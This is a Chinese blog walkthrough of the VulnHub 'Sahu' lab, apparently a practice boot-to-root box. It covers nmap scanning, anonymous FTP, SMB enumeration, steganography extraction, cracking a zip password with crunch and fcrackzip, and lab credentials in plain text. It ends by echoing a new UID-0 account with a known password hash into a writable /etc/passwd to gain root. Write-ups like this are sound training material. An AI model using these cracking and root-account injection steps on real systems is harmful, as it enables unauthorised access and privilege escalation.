vulnhub-sahu-wp

最新推荐文章于 2024-02-27 21:29:34 发布
最新推荐文章于 2024-02-27 21:29:34 发布
阅读量227 收藏
点赞数
分类专栏: vulnhub 文章标签: 信息安全 smb 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/108304781
版权

靶机描述

Sahu is a Virtualbox VM Built on Ubuntu 64 bit , The Goal Of this Machine is to get root And Read the root.txt file with Some Good Enumeration Skills

Difficulty : Beginner

Goal : Boot To Root

## Changelog: v1.1 - 2020-03-04 v1.0 - 2020-02-01

下载 https://www.vulnhub.com/entry/sahu-11,421/

清单

  • 信息搜集

    • netdiscover
    • nmap
    • enum4linux
    • crunch
    • fcrackzip

  • 提权

    • 可写入 /etcpasswd

信息搜集

靶机IP

image-20200829215109719

端口扫描

nmap -A -p- 192.168.217.175

21/tcp  open  ftp         vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             230 Jan 30  2020 ftp.zip
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.217.168
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:78:c5:73:f2:86:cb:cb:02:7f:b6:72:85:61:ac:91 (RSA)
|   256 22:1a:ee:1a:98:4f:32:e7:dc:30:43:52:2c:b2:24:06 (ECDSA)
|_  256 1a:9b:28:b3:ad:58:32:e9:6c:f3:ea:3b:cf:6b:08:ad (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
445/tcp open  netbios-ssn Samba smbd 4.10.7-Ubuntu (workgroup: SAHU)

开放 21、22、80、139、445

21 可以匿名登陆

image-20200829213037712

得到一个压缩包,但是没有密码

80 端口 一张图片

image-20200829212547984

139、445

enum4linux

image-20200829213137136

使用 enum4linux 来对主机搜集信息

得到 sahu 用户

image-20200829213238708

同样需要密码

目录扫描

dirb http://192.168.217.175/ /usr/share/wordlists/dirb/big.txt

image-20200829212634967

当扫描目录时发现,出现 /H/A ,像是网页中的 haryana

补全访问网页

view-source:http://192.168.217.175/H/A/R/Y/A/N/A/

image-20200829212819953

在末尾发现了 extract with hurry

将主页的图片下载下来

image-20200829213346333

提取得到信息 1

steghide extract -sf Haryana-1-1.jpg -p hurrry

image-20200829213429857

I have found the password for a zip file but i have forgote the last part of it, can you find out

现在,根据提示给出来生成字典

字典生成 crunch

crunch 2

image-20200829213539198

使用生成的字典 zippasswd01 来破解zip

fcrackzip -D -u -p zippasswd01 ftp.zip

image-20200829213616157

得到密码 5AHU#5

解压压缩包

image-20200829213734611

得到 ftp 用户密码

sahu
sahu14216

登陆 smb

smbclient //192.168.217.175/sambashare -U sahu

image-20200829213917315

获得 ssh 账户、密码

image-20200829214239090

提权

登陆之后发现 /etc/passwd 是可以写入的3

现在来写入一个新的用户

echo "yutian:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash: >> /etc/passwd

# 密码为 Password@973

image-20200829214402753

切换用户 得到 root

  1. https://blog.csdn.net/abc_12366/article/details/87098397 ↩︎

  2. https://www.freebuf.com/sectool/170817.html ↩︎

  3. https://www.freebuf.com/articles/system/210425.html ↩︎

赛博雨天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Swapna-Sahu
03-17
嗨,我是前端开发人员Swapna Sahu :rocket: 来自哥本哈根(丹麦),我是一个热情且积极进取的前端开发人员,在Vue和React框架方面拥有丰富的经验,我喜欢分享知识和冥想。 :memo: 谈论个人资料: currently‍:...
Hello-ReactVR:React JS的虚拟现实
02-06
React虚拟现实样本 NPM命令 安装React VR CLI工具 npm install -g react-vr-cli 创建React VR项目 react-vr init WelcomeToVR ... Copyright 2017 Hitesh Sahu (http://hiteshsahu.com) Licensed under th
vulnhub sahu-v1.1
底层社会中的弱智
03-25 348
在局域网中找到目标主机的IP 192.168.2.7 分析开放的端口 21号端口为ftp服务器 允许匿名登陆 22好端口ssh服务对应openssh 8.0p1版本 暂无漏洞 80端口http服务中间件apache2.4.41 139和445为文件共享服务 柿子挑软的捏,先去ftp匿名登陆 下载 发现有密码暂且放下 去网页搜索信息 使用目录扫描右键查看...
linux-2.6.35.6内核netfilter框架,Linux2.6内核Netfilter的简单例子、七(netMonitor)
weixin_42530536的博客
05-01 121
2010年02月26日 星期五 17时48分02秒升级whoVisit的功能,监视5个hook点的网络信息,以便调试我的其他netfilter模块。1、netMonitor.c#include #include /* for tcphdr */#include #include /* for csum_tcpudp_mag...
计算机视觉论文-2021-03-03
中科院AI算法工程师的博客
03-03 2260
本专栏是计算机视觉方向论文收集积累,时间:2021年3月3日,来源:paper digest 欢迎关注原创公众号【计算机视觉联盟】,回复【西瓜书手推笔记】可获取我的机器学习纯手推笔记! 直达笔记地址:机器学习手推笔记(GitHub地址) 1, TITLE:DeepMerge II: Building Robust Deep Learning Algorithms for Merging Galaxy Identification Across Domains AUTHORS: A. ?...
【NLP】ACL-2019 录用论文
热门推荐
zkq_1986的博客
09-04 2万+
LONG PAPERS (MAIN CONFERENCE) SphereRE: Distinguishing Lexical Relations with Hyperspherical Relation EmbeddingsChengyu Wang, XIAOFENG HE and Aoying Zhou Learning from Dialogue after Deployment: Fee...
Learning Logic Rules for Document-Level Relation Extraction
appllllllle的博客
07-17 200
文档级关系提取旨在识别整个文档中实体之间的关系。先前捕获远程依赖关系的努力严重依赖于通过(图)神经网络学习的隐式强大表示,这使得模型不太透明。为了解决这一挑战,本文提出了LogiRE,这是一种通过学习逻辑规则来提取文档级关系的新型概率模型。LogiRE将逻辑规则视为潜在变量,由两个模块组成:规则生成器和关系提取器。规则生成器生成可能有助于最终预测的逻辑规则,关系提取器根据生成的逻辑规则输出最终预测。利用期望最大化(EM)算法可以对这两个模块进行有效的优化。
Distributed Stochastic Gradient Descent with Event-Triggered Communication
weixin_41697507的博客
07-29 1282
Distributed Stochastic Gradient Descent with Event-Triggered Communication Abstract We develop a Distributed Event-Triggered Stochastic GRAdient Descent (DETSGRAD) algorithm for solving non-convex optimization problems typically encountered in distributed
随机无梯度Frank-Wolfe方法的统一分析
HGGshiwo的博客
01-15 872
INTERNATIONAL TRANSACTIONS IN OPERATIONAL RESEARCH Intl. Trans. in Op. Res. 00 (2020) 1–24 DOI: 10.1111/itor.12889 A unifified analysis of stochastic gradient-free Frank–Wolfe methods Jiahong Guo, Huiling Liu and Xiantao Xiao∗ School of ...
「隐语小课」联邦学习之Non-IID问题
m0_69580723的博客
09-15 1598
联邦学习、水平联邦学习
Lrcshow-X_sahu_1_0
06-17
《Lrcshow-X_sahu_1_0》是一款专门针对音乐爱好者设计的歌词显示软件,其主要功能在于为用户提供精确的歌词同步展示服务。在这一版本中,开发者着重解决了之前存在的一个问题,即对于以数字加小数点开头的歌曲文件名...
基于Sahu-Shanmugam和Fournier-Forand体积散射函数的水下激光传输特性分析
01-26
结合Sahu-Shanmugam和Fournier-Forand体积散射函数,使用蒙特卡罗方法建立水下激光传输信道模型,利用该模型分析了接收端的光束扩展特性。研究了三种典型水域下,接收视场角和接收面直径对光束功率密度的影响,以及不同...
matlab开发-共同基金统计
08-28
报告“ashish.r.sahu_summer_report.pdf”可能包含了利用Minitab软件进行的初步分析。Minitab是一款广泛使用的统计分析软件,尤其在六西格玛(Six Sigma)方法中广泛应用。六西格玛是一种改进流程质量和效率的管理...
vulnhub-So Simple 1
yutianovo的博客
08-10 1298
靶机描述 This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag). The VM is tested on Virtualbox. After the startup it shows the IP address. Share your rootflag with me on Twitter
vulnhub-Tiki - 类oscp靶机攻略1
yutianovo的博客
07-14 1236
本文为类oscp靶机打靶1
vulnhub-Cybox: 1.1
yutianovo的博客
12-25 1064
靶机描述 http://blog.yutian233.xyz/index.php/archives/72/ Will you be able to compromise the internal server of the CYBOX company? Difficulty: Medium Objective: Get user.txt and root.txt This works better with VirtualBox rather than VMware. Contact: @takit
工具使用-pwncat
最新发布
yutianovo的博客
02-27 990
pwncat是一个命令和控制框架,可以将基本的反向或绑定shell转化为一个功能齐全的利用平台。然后,它将尝试在远程主机上启动一个伪终端,并为您提供原始终端访问。
vulnhub-DevGuru:1
yutianovo的博客
12-24 909
靶机描述 DevGuru is a fictional web development company hiring you for a pentest assessment. You have been tasked with finding vulnerabilities on their corporate website and obtaining root. OSCP like ~ Real life based Difficulty: Intermediate (Depends on exp
PEM-INST-001(塑封微电路选择、筛选及鉴定程序)归类.pdf
02-22
Kusum Sahu编写,并由Dr. Henning Leidecker审阅,Darryl Lakins批准。这份报告详细阐述了塑封微电路(PEM)的选择、筛选和资格鉴定的流程和方法。 报告内容主要涉及以下几个关键知识点: 1. **塑封微电路(PEM)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值